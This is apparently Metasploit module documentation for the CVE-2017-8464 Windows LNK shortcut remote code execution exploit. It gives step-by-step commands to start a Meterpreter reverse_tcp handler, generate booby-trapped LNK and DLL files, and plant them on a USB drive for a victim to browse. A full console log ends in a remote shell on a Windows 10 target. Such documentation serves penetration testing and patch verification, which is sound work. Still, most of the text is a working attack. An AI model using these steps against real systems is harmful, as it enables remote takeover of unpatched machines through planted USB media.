## Vulnerable Application

This vulnerability affects any Windows version without the patch for
CVE-2017-8464. The exploit does not appear to work with UNC drives. Because of
this, the exploit DLL file needs to be on a local file system or an USB drive.
A fix was released in the June 2017 Patch Tuesday.

## Vulnerable Setup

To set up the vulnerable environment, install a Windows version without the patch for CVE-2017-8464.
## Verification Steps

### Start a handler
  1. `use exploit/multi/handler`
  2. `set PAYLOAD windows/x64/meterpreter/reverse_tcp`
  3. `set LHOST [ip victim connects back to]`
  4. `exploit -j`

### Run the exploit

  1. `use exploit/windows/fileformat/cve_2017_8464_lnk_rce`
  2. `set PAYLOAD windows/x64/meterpreter/reverse_tcp`
  3. `set LHOST [ip victim connects back to]`
  4. `exploit`

### Copy files to USB drive & open on vulnerable system

  1. `cp /root/.msf4/local/* [USB drive path]`
  2. Insert device in target machine and browse to it

## Options

**FILENAME**

The file name of the LNK file. This file name can be renamed later. If the value is not set, a random name will be generated.

**DLLNAME**

The file name of the DLL file. This file cannot be renamed, as this will invalidate the LNK file(s). If not set, a random name will be generated.

**DRIVE**

Drive letter assigned to USB drive on victim's machine. If not set, LNK files for drive D till Z will be created. Copy all these LNK files to the USB drive to increase the chance that the vulnerability will be triggered.

### Windows 10 x64 (Build 14393)

```
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.146.197
LHOST => 192.168.146.197
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.146.197:4444
[*] Starting the payload handler...
msf exploit(handler) > back
msf > use exploit/windows/fileformat/cve_2017_8464_lnk_rce
msf exploit(cve_2017_8464_lnk_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(cve_2017_8464_lnk_rce) > set LHOST 192.168.146.197
LHOST => 192.168.146.197
msf exploit(cve_2017_8464_lnk_rce) > exploit

msf exploit(cve_2017_8464_lnk_rce) > exploit

[*] /root/.msf4/local/kNgYlztVprHPOmHY.dll created, copy it to the root folder of the target USB drive
[*] /root/.msf4/local/SoXXZhgCWEDkbDyA_D.lnk created, copy to the target USB drive
[*] /root/.msf4/local/rfuSAlSFEPmrgsBh_E.lnk created, copy to the target USB drive
[*] /root/.msf4/local/LydLhRBovVRINgUh_F.lnk created, copy to the target USB drive
[*] /root/.msf4/local/xbpnlkcQOYonGpKW_G.lnk created, copy to the target USB drive
[*] /root/.msf4/local/SezkrIUwqIVvMiOZ_H.lnk created, copy to the target USB drive
[*] /root/.msf4/local/UzsJRIdcpoZPpLEj_I.lnk created, copy to the target USB drive
[*] /root/.msf4/local/BxTkakFYhUaxSNyi_J.lnk created, copy to the target USB drive
[*] /root/.msf4/local/dPdanTusElQRKzGZ_K.lnk created, copy to the target USB drive
[*] /root/.msf4/local/cKUaDslpjLshMEpP_L.lnk created, copy to the target USB drive
[*] /root/.msf4/local/RQPOxJeuGqVCQGNB_M.lnk created, copy to the target USB drive
[*] /root/.msf4/local/tLDnpaeIeUavIxqP_N.lnk created, copy to the target USB drive
[*] /root/.msf4/local/VVQOvhpqJYbhINIX_O.lnk created, copy to the target USB drive
[*] /root/.msf4/local/dAIEBrbaixsXjnnm_P.lnk created, copy to the target USB drive
[*] /root/.msf4/local/AoHnIQhKkpnYSOZR_Q.lnk created, copy to the target USB drive
[*] /root/.msf4/local/kZCCppTXKsuGRSCB_R.lnk created, copy to the target USB drive
[*] /root/.msf4/local/vMBPqzoOEoJXhZqQ_S.lnk created, copy to the target USB drive
[*] /root/.msf4/local/ueCsaNzVsljfHKnS_T.lnk created, copy to the target USB drive
[*] /root/.msf4/local/TSCgPoYrFFnZqMsl_U.lnk created, copy to the target USB drive
[*] /root/.msf4/local/QFbXkQeBmCvXezNg_V.lnk created, copy to the target USB drive
[*] /root/.msf4/local/liPaOopqYJbBIrVY_W.lnk created, copy to the target USB drive
[*] /root/.msf4/local/eZiWpyEYbkWHqStW_X.lnk created, copy to the target USB drive
[*] /root/.msf4/local/PawzVPKmvBoSblhA_Y.lnk created, copy to the target USB drive
[*] /root/.msf4/local/vJhDzJUydwYxnLlp_Z.lnk created, copy to the target USB drive
msf exploit(cve_2017_8464_lnk_rce) >
[*] Sending stage (1189423 bytes) to 192.168.146.193
[*] Meterpreter session 1 opened (192.168.146.197:4444 -> 192.168.146.193:50020) at 2017-07-25 19:28:27 +0200
sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-5G8HK7E
OS              : Windows 10 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >
```
